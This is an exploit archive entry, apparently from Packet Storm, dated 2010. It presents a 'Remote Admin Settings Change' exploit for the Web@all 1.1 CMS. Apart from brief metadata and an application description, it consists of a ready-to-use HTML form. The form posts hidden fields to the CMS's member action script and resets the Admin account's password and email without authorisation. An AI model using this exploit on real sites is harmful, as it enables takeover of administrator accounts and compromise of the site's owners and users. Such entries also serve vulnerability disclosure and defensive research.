Web@All 1.1 Remote Admin Settings Change Exploit

2010-12-27T00:00:00
ID PACKETSTORM:97077
Type packetstorm
Reporter giudinvx
Modified 2010-12-27T00:00:00

Description

                                        
                                            `===========================================  
Web@all <= 1.1 Remote Admin Settings Change  
===========================================  
  
Author___: giudinvx  
Email____: <giudinvx[at]gmail[dot]com>  
Date_____: 27/12/2010  
Site_____: http://www.giudinvx.altervista.org/  
--------------------------------------------------------  
Application Info:  
web@all 1.1  
web@all is a CMS which is not similar to general CMS,  
you can build it easyly by yourself.  
www.webatall.com  
--------------------------------------------------------  
  
==============[[ -Exploit Code- ]]==============  
  
<html>  
<form method="post" enctype="multipart/form-data"  
action="[localhost]mem/action.php" name="f1">  
Change Admin user, password and email.<br/>  
Password<input type="text" value="" name="password"><br/>  
Password<input type="text" value="" name="answer"><br/>  
Email<input type="text" value="" name="email">  
<input type="hidden" value="Admin" name="nickname">  
<input type="hidden" value="" name="question">  
<input type="hidden" value="" name="sign">  
<input type="hidden" value="" name="person[firstname]">  
<input type="hidden" value="" name="person[lastname]">  
<input type="hidden" value="" name="person[country]">  
<input type="hidden" value="" name="person[province]">  
<input type="hidden" value="" name="person[city]">  
<input type="hidden" value="" name="person[address]">  
<input type="hidden" value="" name="person[zip]">  
<input type="hidden" value="" name="person[mobile]">  
<input type="hidden" value="" name="person[phone]">  
<input type="hidden" value="" name="person[other]">  
<input type="hidden" value="member" name="_lib">  
<input type="hidden" value="member" name="_file">  
<input type="hidden" value="person" name="memtype">  
<input type="hidden" value="do_edit" name="_act">  
<input type="submit" value="Submit">  
</form>  
</html>  
  
`